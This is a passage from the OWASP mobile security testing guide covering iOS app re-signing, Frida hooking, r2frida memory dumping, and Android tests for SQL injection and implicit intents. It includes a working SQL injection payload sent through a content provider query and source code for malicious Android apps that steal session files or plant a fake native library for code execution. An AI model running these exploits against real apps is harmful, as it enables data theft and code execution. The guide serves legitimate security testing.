Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
Tampering with an app invalidates the main executable's code signature, so this won't run on a non-jailbroken device. You'll need to replace the provisioning profile and sign both the main executable and the files you've included (e.g. FridaGadget.dylib
) with the certificate listed in the profile.
First, let's add our own provisioning profile to the package:
cp AwesomeRepackaging.mobileprovision Payload/UnCrackable\\ Level\\ 1.app/embedded.mobileprovision\n
Next, we need to make sure that the Bundle ID in Info.plist
matches the one specified in the profile because the codesign tool will read the Bundle ID from Info.plist
during signing; the wrong value will lead to an invalid signature.
/usr/libexec/PlistBuddy -c \"Set :CFBundleIdentifier sg.vantagepoint.repackage\" Payload/UnCrackable\\ Level\\ 1.app/Info.plist\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0092/#re-signing","title":"Re-Signing","text":"Finally, we use the codesign tool to re-sign both binaries. You need to use your own signing identity (in this example 8004380F331DCA22CC1B47FB1A805890AE41C938), which you can output by executing the command security find-identity -v
.
$ rm -rf Payload/UnCrackable\\ Level\\ 1.app/_CodeSignature\n$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 Payload/UnCrackable\\ Level\\ 1.app/FridaGadget.dylib\nPayload/UnCrackable Level 1.app/FridaGadget.dylib: replacing existing signature\n
entitlements.plist
is the file you created for your empty iOS project.
$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 --entitlements entitlements.plist Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nPayload/UnCrackable Level 1.app/UnCrackable Level 1: replacing existing signature\n
Now you should be ready to run the modified app. Deploy and run the app on the device using ios-deploy:
ios-deploy --debug --bundle Payload/UnCrackable\\ Level\\ 1.app/\n
If everything went well, the app should start in debugging mode with LLDB attached. Frida should then be able to attach to the app as well. You can verify this via the frida-ps command:
$ frida-ps -U\nPID Name\n--- ------\n499 Gadget\n
When something goes wrong (and it usually does), mismatches between the provisioning profile and code-signing header are the most likely causes. Reading the official documentation helps you understand the code-signing process. Apple's entitlement troubleshooting page is also a useful resource.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0094/","title":"Getting Loaded Classes and Methods dynamically","text":"In the Frida REPL Objective-C runtime the ObjC
command can be used to access information within the running app. Within the ObjC
command the function enumerateLoadedClasses
lists the loaded classes for a given application.
$ frida -U -f com.iOweApp\n\n[iPhone::com.iOweApp]-> ObjC.enumerateLoadedClasses()\n{\n \"/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\": [\n \"__NSBlockVariable__\",\n \"__NSGlobalBlock__\",\n \"__NSFinalizingBlock__\",\n \"__NSAutoBlock__\",\n \"__NSMallocBlock__\",\n \"__NSStackBlock__\"\n ],\n \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\": [\n \"JailbreakDetection\",\n \"CriticalLogic\",\n \"ViewController\",\n \"AppDelegate\"\n ]\n}\n
Using ObjC.classes.<classname>.$ownMethods
the methods declared in each class can be listed.
[iPhone::com.iOweApp]-> ObjC.classes.JailbreakDetection.$ownMethods\n[\n \"+ isJailbroken\"\n]\n\n[iPhone::com.iOweApp]-> ObjC.classes.CriticalLogic.$ownMethods\n[\n \"+ doSha256:\",\n \"- a:\",\n \"- AES128Operation:data:key:iv:\",\n \"- coreLogic\",\n \"- bat\",\n \"- b:\",\n \"- hexString:\"\n]\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/#frida","title":"Frida","text":"In section \"Execution Tracing\" we've used frida-trace when navigating to a website in Safari and found that the initWithURL:
method is called to initialize a new URL request object. We can look up the declaration of this method on the Apple Developer Website:
- (instancetype)initWithURL:(NSURL *)url;\n
Using this information we can write a Frida script that intercepts the initWithURL:
method and prints the URL passed to the method. The full script is below. Make sure you read the code and inline comments to understand what's going on.
import sys\nimport frida\n\n\n# JavaScript to be injected\nfrida_code = \"\"\"\n\n // Obtain a reference to the initWithURL: method of the NSURLRequest class\n var URL = ObjC.classes.NSURLRequest[\"- initWithURL:\"];\n\n // Intercept the method\n Interceptor.attach(URL.implementation, {\n onEnter: function(args) {\n // Get a handle on NSString\n var NSString = ObjC.classes.NSString;\n\n // Obtain a reference to the NSLog function, and use it to print the URL value\n // args[2] refers to the first method argument (NSURL *url)\n var NSLog = new NativeFunction(Module.findExportByName('Foundation', 'NSLog'), 'void', ['pointer', '...']);\n\n // We should always initialize an autorelease pool before interacting with Objective-C APIs\n var pool = ObjC.classes.NSAutoreleasePool.alloc().init();\n\n try {\n // Creates a JS binding given a NativePointer.\n var myNSURL = new ObjC.Object(args[2]);\n\n // Create an immutable ObjC string object from a JS string object.\n var str_url = NSString.stringWithString_(myNSURL.toString());\n\n // Call the iOS NSLog function to print the URL to the iOS device logs\n NSLog(str_url);\n\n // Use Frida's console.log to print the URL to your terminal\n console.log(str_url);\n\n } finally {\n pool.release();\n }\n }\n });\n\"\"\"\n\nprocess = frida.get_usb_device().attach(\"Safari\")\nscript = process.create_script(frida_code)\nscript.load()\n\nsys.stdin.read()\n
Start Safari on the iOS device. Run the above Python script on your connected host and open the device log (as explained in the section \"Monitoring System Logs\" from the chapter \"iOS Basic Security Testing\"). Try opening a new URL in Safari, e.g. https://github.com/OWASP/owasp-mastg; you should see Frida's output in the logs as well as in your terminal.
Of course, this example illustrates only one of the things you can do with Frida. To unlock the tool's full potential, you should learn to use its JavaScript API. The documentation section of the Frida website has a tutorial and examples for using Frida on iOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows you to perform tasks such as:
As you can see, these tasks are rather supportive and/or passive, they'll help us collect data and information that will support other techniques. Therefore, they're normally used in combination with other techniques such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. First start by opening an r2frida session to the target app (e.g. iGoat-Swift) that should be running on your iPhone (connected per USB). Use the following command:
r2 frida://usb//iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-maps-and-inspection","title":"Memory Maps and Inspection","text":"You can retrieve the app's memory maps by running :dm
:
[0x00000000]> :dm\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100de0000 - 0x0000000100e68000 rw- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100e68000 - 0x0000000100e97000 r-- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n...\n0x0000000100ea8000 - 0x0000000100eb0000 rw-\n0x0000000100eb0000 - 0x0000000100eb4000 r--\n0x0000000100eb4000 - 0x0000000100eb8000 r-x /usr/lib/TweakInject.dylib\n0x0000000100eb8000 - 0x0000000100ebc000 rw- /usr/lib/TweakInject.dylib\n0x0000000100ebc000 - 0x0000000100ec0000 r-- /usr/lib/TweakInject.dylib\n0x0000000100f60000 - 0x00000001012dc000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/Frameworks/Realm.framework/Realm\n
While you're searching or exploring the app memory, you can always verify where your current offset is located in the memory map. Instead of noting and searching for the memory address in this list you can simply run :dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested into the modules (binaries and libraries) that the app has loaded, you can use the command :il
to list them all:
[0x00000000]> :il\n0x0000000100b7c000 iGoat-Swift\n0x0000000100eb4000 TweakInject.dylib\n0x00000001862c0000 SystemConfiguration\n0x00000001847c0000 libc++.1.dylib\n0x0000000185ed9000 Foundation\n0x000000018483c000 libobjc.A.dylib\n0x00000001847be000 libSystem.B.dylib\n0x0000000185b77000 CFNetwork\n0x0000000187d64000 CoreData\n0x00000001854b4000 CoreFoundation\n0x00000001861d3000 Security\n0x000000018ea1d000 UIKit\n0x0000000100f60000 Realm\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the main app binary iGoat-Swift is located at 0x0000000100b7c000
and the Realm Framework at 0x0000000100f60000
.
You can also use objection to display the same information.
$ objection --gadget OWASP.iGoat-Swift explore\n\nOWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n-------------------------------- ----------- -------------------- ------------------------------------------------------------------------------\niGoat-Swift 0x100b7c000 2506752 (2.4 MiB) /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGo...\nTweakInject.dylib 0x100eb4000 16384 (16.0 KiB) /usr/lib/TweakInject.dylib\nSystemConfiguration 0x1862c0000 446464 (436.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio...\nlibc++.1.dylib 0x1847c0000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. In this first example, you can start by searching for something that you know should be located in the main binary of the app:
[0x00000000]> \\/ iGoat\nSearching 5 bytes: 69 47 6f 61 74\nSearching 5 bytes in [0x0000000100b7c000-0x0000000100de0000]\n...\nhits: 509\n0x100d7d332 hit2_0 iGoat_Swift24StringAnalysisExerciseVCC\n0x100d7d3b2 hit2_1 iGoat_Swift28BrokenCryptographyExerciseVCC\n0x100d7d442 hit2_2 iGoat_Swift23BackgroundingExerciseVCC\n0x100d7d4b2 hit2_3 iGoat_Swift9AboutCellC\n0x100d7d522 hit2_4 iGoat_Swift12FadeAnimatorV\n
Now take the first hit, seek to it and check your current location in the memory map:
[0x00000000]> s 0x100d7d332\n[0x100d7d332]> :dm.\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n
As expected, you are located in the region of the main iGoat-Swift binary (r-x, read and execute). In the previous section, you saw that the main binary is located between 0x0000000100b7c000
and 0x0000000100e97000
.
Now, for this second example, you can search for something that's neither in the app binary nor in any loaded library, typically user input. Open the iGoat-Swift app and navigate in the menu to Authentication -> Remote Authentication -> Start. There you'll find a password field that you can overwrite. Write the string \"owasp-mstg\" but do not click on Login just yet. Perform the following two steps.
[0x00000000]> \\/ owasp-mstg\nhits: 1\n0x1c06619c0 hit3_0 owasp-mstg\n
In fact, the string could be found at address 0x1c06619c0
. Seek s
to there and retrieve the current memory region with :dm.
.
[0x100d7d332]> s 0x1c06619c0\n[0x1c06619c0]> :dm.\n0x00000001c0000000 - 0x00000001c8000000 rw-\n
Now you know that the string is located in a rw- (read and write) region of the memory map.
Additionally, you can search for occurrences of the wide version of the string (/w
) and, again, check their memory regions:
This time we run the \\dm.
command for all @@
hits matching the glob hit5_*
.
[0x00000000]> /w owasp-mstg\nSearching 20 bytes: 6f 00 77 00 61 00 73 00 70 00 2d 00 6d 00 73 00 74 00 67 00\nSearching 20 bytes in [0x0000000100708000-0x000000010096c000]\n...\nhits: 2\n0x1020d1280 hit5_0 6f0077006100730070002d006d00730074006700\n0x1030c9c85 hit5_1 6f0077006100730070002d006d00730074006700\n\n[0x00000000]> \\dm.@@ hit5_*\n0x0000000102000000 - 0x0000000102100000 rw-\n0x0000000103084000 - 0x00000001030cc000 rw-\n
They are in a different rw- region. Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could continue the previous example, this time clicking on Login and searching again for occurrences of the data. Also, you may check if you still can find those strings in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-jailbroken device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section \"Dynamic Analysis on Non-Jailbroken Devices\". To use these tools on a jailbroken phone, simply have frida-server installed and running.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection explore\n\niPhone on (iPhone: 10.3.1) [usb] # memory dump all /Users/foo/memory_iOS/memory\nDumping 768.0 KiB from base: 0x1ad200000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_iOS/memory\n
Alternatively you can use Fridump. First, you need the name of the app you want to dump, which you can get with frida-ps
.
$ frida-ps -U\n PID Name\n---- ------\n1026 Gadget\n
Afterwards, specify the app name in Fridump.
$ python3 fridump.py -u Gadget -s\n\nCurrent Directory: /Users/foo/PentestTools/iOS/fridump\nOutput directory is set to: /Users/foo/PentestTools/iOS/fridump/dump\nCreating directory...\nStarting Memory dump...\nProgress: [##################################################] 100.0% Complete\n\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished! Press Ctrl+C\n
When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is stored in Fridump's dump directory.
In both cases, if you open the file in radare2 you can use its search command (/
). Note that first we do a standard string search which doesn't succeed and next we search for a wide string, which successfully finds our string \"owasp-mstg\".
$ r2 memory_ios\n[0x00000000]> / owasp-mstg\nSearching 10 bytes in [0x0-0x628c000]\nhits: 0\n[0x00000000]> /w owasp-mstg\nSearching 20 bytes in [0x0-0x628c000]\nhits: 1\n0x0036f800 hit4_0 6f0077006100730070002d006d00730074006700\n
Next, we can seek to its address using s 0x0036f800
or s hit4_0
and print it using psw
(which stands for print string wide) or use px
to print its raw hexadecimal values:
[0x0036f800]> psw\nowasp-mstg\n\n[0x0036f800]> px 48\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n0x0036f800 6f00 7700 6100 7300 7000 2d00 6d00 7300 o.w.a.s.p.-.m.s.\n0x0036f810 7400 6700 0000 0000 0000 0000 0000 0000 t.g.............\n0x0036f820 0000 0000 0000 0000 0000 0000 0000 0000 ................\n
Note that in order to find this string using the strings
command you'll have to specify an encoding using the -e
flag and in this case l
for 16-bit little-endian character.
$ strings -e l memory_ios | grep owasp-mstg\nowasp-mstg\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0097/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the iGoat-Swift app, open a session with r2frida r2 frida://usb//iGoat-Swift
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos darwin\npid 2166\nuid 501\nobjc true\nruntime V8\njava false\ncylang true\npageSize 16384\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libboringssl.dylib
.
The following does a case-insensitive search (grep) for symbols including \"aes\" (~+aes
).
[0x00000000]> \\is libboringssl.dylib~+aes\n0x1863d6ed8 s EVP_aes_128_cbc\n0x1863d6ee4 s EVP_aes_192_cbc\n0x1863d6ef0 s EVP_aes_256_cbc\n0x1863d6f14 s EVP_has_aes_hardware\n0x1863d6f1c s aes_init_key\n0x1863d728c s aes_cipher\n0x0 u ccaes_cbc_decrypt_mode\n0x0 u ccaes_cbc_encrypt_mode\n...\n
Or you might prefer to look into the imports/exports. For example:
:ii iGoat-Swift
.:iE /usr/lib/libc++.1.dylib
.For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. :ii iGoat-Swift~..
(if not, for this binary, you'd get almost 5000 lines printed to your terminal).
The next thing you might want to look at are the classes:
[0x00000000]> \\ic~+passcode\nPSPasscodeField\n_UITextFieldPasscodeCutoutBackground\nUIPasscodeField\nPasscodeFieldCell\n...\n
List class fields:
[0x19687256c]> \\ic UIPasscodeField\n0x000000018eec6680 - becomeFirstResponder\n0x000000018eec5d78 - appendString:\n0x000000018eec6650 - canBecomeFirstResponder\n0x000000018eec6700 - isFirstResponder\n0x000000018eec6a60 - hitTest:forEvent:\n0x000000018eec5384 - setKeyboardType:\n0x000000018eec5c8c - setStringValue:\n0x000000018eec5c64 - stringValue\n...\n
Imagine that you are interested into 0x000000018eec5c8c - setStringValue:
. You can seek to that address with s 0x000000018eec5c8c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
[0x18eec5c8c]> pd 10\n\u256d (fcn) fcn.18eec5c8c 35\n\u2502 fcn.18eec5c8c (int32_t arg1, int32_t arg3);\n\u2502 bp: 0 (vars 0, args 0)\n\u2502 sp: 0 (vars 0, args 0)\n\u2502 rg: 2 (vars 0, args 2)\n\u2502 0x18eec5c8c f657bd not byte [rdi - 0x43] ; arg1\n\u2502 0x18eec5c8f a9f44f01a9 test eax, 0xa9014ff4\n\u2502 0x18eec5c94 fd std\n\u2502 \u256d\u2500< 0x18eec5c95 7b02 jnp 0x18eec5c99\n\u2502 \u2502 0x18eec5c97 a9fd830091 test eax, 0x910083fd\n\u2502 0x18eec5c9c f30300 add eax, dword [rax]\n\u2502 0x18eec5c9f aa stosb byte [rdi], al\n\u2502 \u256d\u2500< 0x18eec5ca0 e003 loopne 0x18eec5ca5\n\u2502 \u2502 0x18eec5ca2 02aa9b494197 add ch, byte [rdx - 0x68beb665] ; arg3\n\u2570 0x18eec5ca8 f4 hlt\n
Finally, instead of doing a full memory search for strings, you may want to retrieve the strings from a certain binary and filter them, as you'd do offline with radare2. For this you have to find the binary, seek to it and then run the :iz
command.
It's recommended to apply a filter with a keyword ~<keyword>
/~+<keyword>
to minimize the terminal output. If just want to explore all results you can also pipe them to the internal less \\iz~..
.
[0x00000000]> :il~iGoa\n0x00000001006b8000 iGoat-Swift\n[0x00000000]> s 0x00000001006b8000\n[0x1006b8000]> :iz\nReading 2.390625MB ...\nDo you want to print 8568 lines? (y/N) N\n[0x1006b8000]> :iz~+hill\nReading 2.390625MB ...\n[0x1006b8000]> :iz~+pass\nReading 2.390625MB ...\n0x00000001006b93ed \"passwordTextField\"\n0x00000001006bb11a \"11iGoat_Swift20KeychainPasswordItemV0C5ErrorO\"\n0x00000001006bb164 \"unexpectedPasswordData\"\n0x00000001006d3f62 \"Error reading password from keychain - \"\n0x00000001006d40f2 \"Incorrect Password\"\n0x00000001006d4112 \"Enter the correct password\"\n0x00000001006d4632 \"T@\"UITextField\",N,W,VpasswordField\"\n0x00000001006d46f2 \"CREATE TABLE IF NOT EXISTS creds (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT);\"\n0x00000001006d4792 \"INSERT INTO creds(username, password) VALUES(?, ?)\"\n
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0098/","title":"Patching React Native Apps","text":"If the React Native framework has been used for development, the main application code is in the file Payload/[APP].app/main.jsbundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. With the tool JStillery, a human-readable version of the file can be retrieved, which will allow code analysis. The CLI version of JStillery and the local server are preferable to the online version because the latter discloses the source code to a third party.
At installation time, the application archive is unpacked into the folder /private/var/containers/Bundle/Application/[GUID]/[APP].app
from iOS 10 onward, so the main JavaScript application file can be modified at this location.
To identify the exact location of the application folder, you can use the tool ipainstaller:
ipainstaller -l
to list the applications installed on the device. Get the name of the target application from the output list.ipainstaller -i [APP_NAME]
to display information about the target application, including the installation and data folder locations.Application:
.Use the following approach to patch the JavaScript file:
Payload/[APP].app/main.jsbundle
to a temporary file.JStillery
to beautify and de-obfuscate the contents of the temporary file.Payload/[APP].app/main.jsbundle
file.Make sure that the unlocked key is used during the application flow. For example, the key may be used to decrypt local storage or a message received from a remote endpoint. If the application simply checks whether the user has unlocked the key or not, the application may be vulnerable to a local authentication bypass.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0017/#dynamic-analysis","title":"Dynamic Analysis","text":"Validate the duration of time (seconds) for which the key is authorized to be used after the user is successfully authenticated. This is only needed if setUserAuthenticationRequired
is used.
Note that there are quite some vendor/third party SDKs, which provide biometric support, but which have their own insecurities. Be very cautious when using third party SDKs to handle sensitive authentication logic.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0018/#dynamic-analysis","title":"Dynamic Analysis","text":"Please take a look at this detailed blog article about the Android KeyStore and Biometric authentication. This research includes two Frida scripts which can be used to test insecure implementations of biometric authentication and try to bypass them:
CryptoObject
is not used in the authenticate
method of the BiometricPrompt
class. The authentication implementation relies on the callback onAuthenticationSucceded
being called.CryptoObject
is used, but used in an incorrect way. The detailed explanation can be found in the section \"Crypto Object Exception Handling\" in the blog post.For any publicly accessible data storage, any process can override the data. This means that input validation needs to be applied the moment the data is read back again.
Note: The same is true for private accessible data on a rooted device
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#static-analysis","title":"Static analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-shared-preferences","title":"Using Shared Preferences","text":"When you use the SharedPreferences.Editor
to read or write int/boolean/long values, you cannot check whether the data is overridden or not. However: it can hardly be used for actual attacks other than chaining the values (e.g. no additional exploits can be packed which will take over the control flow). In the case of a String
or a StringSet
you should be careful with how the data is interpreted. Using reflection based persistence? Check the section on \"Testing Object Persistence\" for Android to see how it should be validated. Using the SharedPreferences.Editor
to store and read certificates or keys? Make sure you have patched your security provider given vulnerabilities such as found in Bouncy Castle.
In all cases, having the content HMACed can help to ensure that no additions and/or changes have been applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-other-storage-mechanisms","title":"Using Other Storage Mechanisms","text":"In case other public storage mechanisms (than the SharedPreferences.Editor
) are used, the data needs to be validated the moment it is read from the storage mechanism.
To test for injection flaws you need to first rely on other tests and check for functionality that might have been exposed:
An example of a vulnerable IPC mechanism is shown below.
You can use ContentProviders to access database information, and you can probe services to see if they return data. If data is not validated properly, the content provider may be prone to SQL injection while other apps are interacting with it. See the following vulnerable implementation of a ContentProvider.
<provider\n android:name=\".OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation\"\n android:authorities=\"sg.vp.owasp_mobile.provider.College\">\n</provider>\n
The AndroidManifest.xml
above defines a content provider that's exported and therefore available to all other apps. The query
function in the OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation.java
class should be inspected.
@Override\npublic Cursor query(Uri uri, String[] projection, String selection,String[] selectionArgs, String sortOrder) {\n SQLiteQueryBuilder qb = new SQLiteQueryBuilder();\n qb.setTables(STUDENTS_TABLE_NAME);\n\n switch (uriMatcher.match(uri)) {\n case STUDENTS:\n qb.setProjectionMap(STUDENTS_PROJECTION_MAP);\n break;\n\n case STUDENT_ID:\n // SQL Injection when providing an ID\n qb.appendWhere( _ID + \"=\" + uri.getPathSegments().get(1));\n Log.e(\"appendWhere\",uri.getPathSegments().get(1).toString());\n break;\n\n default:\n throw new IllegalArgumentException(\"Unknown URI \" + uri);\n }\n\n if (sortOrder == null || sortOrder == \"\"){\n /**\n * By default sort on student names\n */\n sortOrder = NAME;\n }\n Cursor c = qb.query(db, projection, selection, selectionArgs,null, null, sortOrder);\n\n /**\n * register to watch a content URI for changes\n */\n c.setNotificationUri(getContext().getContentResolver(), uri);\n return c;\n}\n
While the user is providing a STUDENT_ID at content://sg.vp.owasp_mobile.provider.College/students
, the query statement is prone to SQL injection. Obviously prepared statements must be used to avoid SQL injection, but input validation should also be applied so that only input that the app is expecting is processed.
All app functions that process data coming in through the UI should implement input validation:
public boolean isAlphaNumeric(String s){\n String pattern= \"^[a-zA-Z0-9]*$\";\n return s.matches(pattern);\n}\n
An alternative to validation functions is type conversion, with, for example, Integer.parseInt
if only integers are expected. The OWASP Input Validation Cheat Sheet contains more information about this topic.
The tester should manually test the input fields with strings like OR 1=1--
if, for example, a local SQL injection vulnerability has been identified.
On a rooted device, the command content can be used to query the data from a content provider. The following command queries the vulnerable function described above.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students\n
SQL injection can be exploited with the following command. Instead of getting the record for Bob only, the user can retrieve all data.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students --where \"name='Bob') OR 1=1--''\"\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/","title":"Testing Implicit Intents","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#overview","title":"Overview","text":"When testing for implicit intents you need to check if they are vulnerable to injection attacks or potentially leaking sensitive data.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#static-analysis","title":"Static Analysis","text":"Inspect the Android Manifest and look for any <intent>
signatures defined inside blocks (which specify the set of other apps an app intends to interact with), check if it contains any system actions (e.g. android.intent.action.GET_CONTENT
, android.intent.action.PICK
, android.media.action.IMAGE_CAPTURE
, etc.) and browse the source code for their occurrence.
For example, the following Intent
doesn't specify any concrete component, meaning that it's an implicit intent. It sets the action android.intent.action.GET_CONTENT
to ask the user for input data and then the app starts the intent by startActivityForResult
and specifying an image chooser.
Intent intent = new Intent();\nintent.setAction(\"android.intent.action.GET_CONTENT\");\nstartActivityForResult(Intent.createChooser(intent, \"\"), REQUEST_IMAGE);\n
The app uses startActivityForResult
instead of startActivity
, indicating that it expects a result (in this case an image), so you should check how the return value of the intent is handled by looking for the onActivityResult
callback. If the return value of the intent isn't properly validated, an attacker may be able to read arbitrary files or execute arbitrary code from the app's internal `/data/data/` storage. A full description of this type of attack can be found in the following blog post."},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-1-arbitrary-file-read","title":"Case 1: Arbitrary File Read","text":"
In this example we're going to see how an attacker can read arbitrary files from within the app's internal storage /data/data/<appname>
due to the improper validation of the return value of the intent.
The performAction
method in the following example reads the implicit intents return value, which can be an attacker provided URI and hands it to getFileItemFromUri
. This method copies the file to a temp folder, which is usual if this file is displayed internally. But if the app stores the URI provided file in an external temp directory e.g by calling getExternalCacheDir
or getExternalFilesDir
an attacker can read this file if he sets the permission android.permission.READ_EXTERNAL_STORAGE
.
private void performAction(Action action){\n ...\n Uri data = intent.getData();\n if (!(data == null || (fileItemFromUri = getFileItemFromUri(data)) == null)) {\n ...\n }\n}\n\nprivate FileItem getFileItemFromUri(Context, context, Uri uri){\n String fileName = UriExtensions.getFileName(uri, context);\n File file = new File(getExternalCacheDir(), \"tmp\");\n file.createNewFile();\n copy(context.openInputStream(uri), new FileOutputStream(file));\n ...\n}\n
The following is the source of a malicious app that exploits the above vulnerable code.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n</application>\n
EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"file:///data/data/<victim_app>/shared_preferences/session.xml\")));\n finish();\n }\n}\n
If the user selects the malicious app to handle the intent, the attacker can now steal the session.xml
file from the app's internal storage. In the previous example, the victim must explicitly select the attacker's malicious app in a dialog. However, developers may choose to suppress this dialog and automatically determine a recipient for the intent. This would allow the attack to occur without any additional user interaction.
The following code sample implements this automatic selection of the recipient. By specifying a priority in the malicious app's intent filter, the attacker can influence the selection sequence.
Intent intent = new Intent(\"android.intent.action.GET_CONTENT\");\nfor(ResolveInfo info : getPackageManager().queryIntentActivities(intent, 0)) {\n intent.setClassName(info.activityInfo.packageName, info.activityInfo.name);\n startActivityForResult(intent);\n return;\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-2-arbitrary-code-execution","title":"Case 2: Arbitrary Code Execution","text":"An improperly handled return value of an implicit intent can lead to arbitrary code execution if the victim app allows content://
and file://
URLs.
An attacker can implement a ContentProvider
that contains public Cursor query(...)
to set an arbitrary file (in this case lib.so), and if the victim loads this file from the content provider by executing copy
the attacker's ParcelFileDescriptor openFile(...)
method will be executed and return a malicious fakelib.so.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n <provider android:name=\".EvilContentProvider\" android:authorities=\"com.attacker.evil\" android:enabled=\"true\" android:exported=\"true\"></provider>\n</application>\n
EvilContentProvider.java
public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {\n MatrixCursor matrixCursor = new MatrixCursor(new String[]{\"_display_name\"});\n matrixCursor.addRow(new Object[]{\"../lib-main/lib.so\"});\n return matrixCursor;\n}\npublic ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {\n return ParcelFileDescriptor.open(new File(\"/data/data/com.attacker/fakelib.so\"), ParcelFileDescriptor.MODE_READ_ONLY);\n}\n
